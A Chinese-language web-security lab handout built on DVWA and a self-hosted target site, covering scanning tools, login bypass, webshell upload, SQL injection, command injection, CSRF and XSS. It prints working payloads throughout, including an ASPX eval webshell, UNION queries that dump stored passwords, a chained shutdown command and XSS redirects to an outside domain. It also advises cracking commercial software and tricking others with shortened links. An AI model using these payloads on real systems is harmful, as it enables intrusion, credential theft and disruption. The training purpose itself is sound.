利用Web漏洞入侵网站并控制服务器和Web漏洞原理与利用

实训目的

深入理解网络无安全的思想。

了解局域网查看软件Lansee的使用方法。

了解端口扫描软件AdvancedPortScanner的使用方法。

了解Web后台扫描软件御剑的使用方法。

了解网站漏洞扫描工具AWVS的使用方法。

了解Webshell连接工具中国菜刀的使用方法。

掌握端口及漏洞扫描的基本知识，能够利用工具进行扫描工作。

掌握网站入侵的一般流程。

了解SQL注入的概念和基本原理。

了解XSS跨站的概念和基本原理。

了解上传漏洞的概念和基本原理。

掌握通过SQL注入进行攻击的基本方法。

掌握通过XSS跨站进行攻击的基本方法。

掌握通过上传漏洞进行攻击的基本方法。

实训准备及注意事项

1．硬件：装有Windows操作系统的计算机1台（关闭防火墙和杀毒软件），接入某局域网。

2．软件：LanSee、AdvancedPortScanner、御剑后台扫描工具、网站漏洞扫描工具AWVS、中国菜刀。

3．严格按照实验步骤进行实验，实验结果以截图的形式进行保留。

4．实验后务必将相关工具软件从机器彻底删除，避免工具被恶意利用影响网络正常使用。

实训背景

局域网查看工具可扫描指定网段并探查共享文件，同时监控网络内所有主机的在线情况。

漏洞扫描是指基于漏洞数据库，通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测，发现可利用的漏洞的一种安全检测（渗透攻击）行为。配备漏洞扫描系统，网络管理人员可以定期的进行网络安全检测服务，安全检测可帮助客户最大可能的消除安全隐患，尽可能早地发现安全漏洞并进行修补，有效的利用已有系统，优化资源，提高网络的运行效率。

端口扫描是指向目标主机发送一组端口扫描消息，并了解其提供的计算机网络服务类型（这些网络服务均与端口号相关）。端口扫描是计算机解密高手喜欢的一种方式。攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上，端口扫描包括向每个端口发送消息，一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。扫描器是一种自动检测远程或本地主机安全性弱点的程序，通过使用扫描器你可以不留痕迹的发现远程服务器的各种TCP端口的分配及提供的服务和它们的软件版本。这就能让我们间接的或直观的了解到远程主机所存在的安全问题。

后台扫描即搜寻网站可能的后台入口，字典扫描是常用的一种Web目录扫描方法，类似于暴力破解，扫描结果是否理想取决于字典的大小。

DVWA（Damn Vulnerable Web Application）是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程。

 

实训准备 在windows上部署一个IIS web服务

安装IIS相关环境并利用IIS服务器发布靶站源代码（注意应用程序池使用.net 4.0并开启.NET

注意：如果.net环境安装不全可在CMD下输入：

"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable

如使用64位的windows系统需要应用程序池设置32位应用程序为true。

实训任务1 网络探查与端口扫描

局域网探查工具LanSee

1、其他主机在局域网中共享一些文件。

2、运行网络查看工具LanSee.exe。

3、点击设置，输入要探查的ip地址段。

4、点击开始进行探查，观察探查结果。

端口扫描工具AdvancedPortScanner

1、打开AdvancedPortScanner软件，在主界面中选择Use range选项，填入准备扫描的网段或主机IP。

2、选择Options-Configuration命令，此时打开Options对话框，在这里可以设置扫描属性，包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。

3、设置完成后点击ok回到主界面，单机Scan按钮，经过一段时间的等待，将显示扫描结果。

实训任务2 Web扫描

网站后台扫描工具御剑

1、打开御剑后台扫描工具，输入要扫描的网站域名。

2、线程选择2-4个，点击开始扫描。

3、等待扫描结果。

网站漏洞扫描工具AWVS

1、安装AWVS软件并破解。

2、利用target finder功能扫描一个IP地址是否提供web服务，是否开启80、443等端口。

3、利用web scanner功能扫描一个网站(自己搭建的靶站)，观察扫描结果(包括漏洞告警、网站结构、cookies等信息)

4、利用site crawler功能爬取网站的文件和目录

实训任务3 漏洞利用

网站后台绕过

1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。

2、尝试使用弱密码登录系统，观察登陆界面给出的反馈。

3、输入一些特殊字符，如‘’/+-=等，点击登录，观察系统反馈。

4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。

5、进入网站后台管理界面。

篡改页面内容

1、在网站前台或后台中寻找能够提交信息的合适位置。

2、提交代码<script>alert("test")</script>，使用另外的主机访问此网站，观察效果。

3、提交代码(代码中的网址可更改):

<script>window.location.href="http://d.mytanwan.com"</script>，观察效果。

实训任务4 上传后门程序(木马)并控制目标主机

一句话木马的使用

1、新建文本文档，将文件后缀修改为aspx，书写内容如下：

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密

实训任务5 密码登录绕过

1、打开Brute Force界面，测试登陆框是否存在注入，提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。

2、仔细观察登录系统时地址栏中的sql语句，在用户名密码提交界面上通过注入逻辑语句使登录判断失效，进入受保护页面。admi

n' or 1=1 --'

实验任务6 命令注入

1、打开Command Injection界面，在该界面提供一个命令行执行环境，输入ip地址返回ping命令的结果。

2、window和linux系统都可以用&&在同一行执行多条命令，尝试注入附加命令使目标主机(延时)关机。&&shutdown -s -t 6

00  shutdow

n –a可取消关机计划

实验任务7 跨站请求伪造

csrf全称为：Cross-site request forgery，是一种常见的web攻击。在场景中，攻击者会伪造一个请求（通常是一个链接），然后欺骗目标用户点击，用户一旦点击，攻击也就完成了。

1、打开CSRF界面，可在New password和Confirm new password处正常修改登录口令。

2、构造一个链接：##

(注意以密码修改的实际地址为准)

3、利用在线短链接生成器伪造该链接。

4、此时可诱骗其他用户点击该链接，通过伪造身份提交密码修改，直接跳转到修改密码成功的页面，成功把密码修改为123。

实验任务4 文件上传

1、建立一个PHP文件，内容为：##

2、打开File Upload界面，将PHP一句话木马上传。

3、得到木马在服务器上的路径。

4、打开中国菜刀，把上传木马路径添加到工具上。

5、双击网址进入文件管理。（注：这里可以进行文件管理，数据库管理，虚拟终端或运行自写脚本）

实验任务5 SQL注入

1、打开SQL Injection界面，该界面的功能是通过输入User ID查询Username。

2、输入1提交，将正常返回查询结果。

3、输入1’提交，将返回一个错误。

4、猜测使用的sql语句可能是：select First name and Surname from 表名 where id='输入的id'。

5、输入1' union select 1,database()#提交，得到数据库名称。

6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#，得到数据库中的表名。

7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#，得到users表的列名。

8、输入1' union select 1,concat(user,password) from users#，得到users表的所有用户名和密码。

实验任务6跨站攻击

1、打开XSS(DOM)界面，点击Select按钮，修改地址栏中的default属性为<script>alert('XXX')</script>，回车后命令被执行。

2、打开XSS(Reflected)界面，点击Submit，修改地址栏中的name=<script>alert('XXX')</script>。

3、利用在线短链接生成器伪造该链接，将短链接发送给小伙伴，命令被执行。

4、打开XSS(Stored)界面，在message栏中填入

<script> window.location.href="http://d.mytanwan.com/h/26026.html"</script>，提交后内容被存入数据库，之后每次进入该页面命令都会被执行。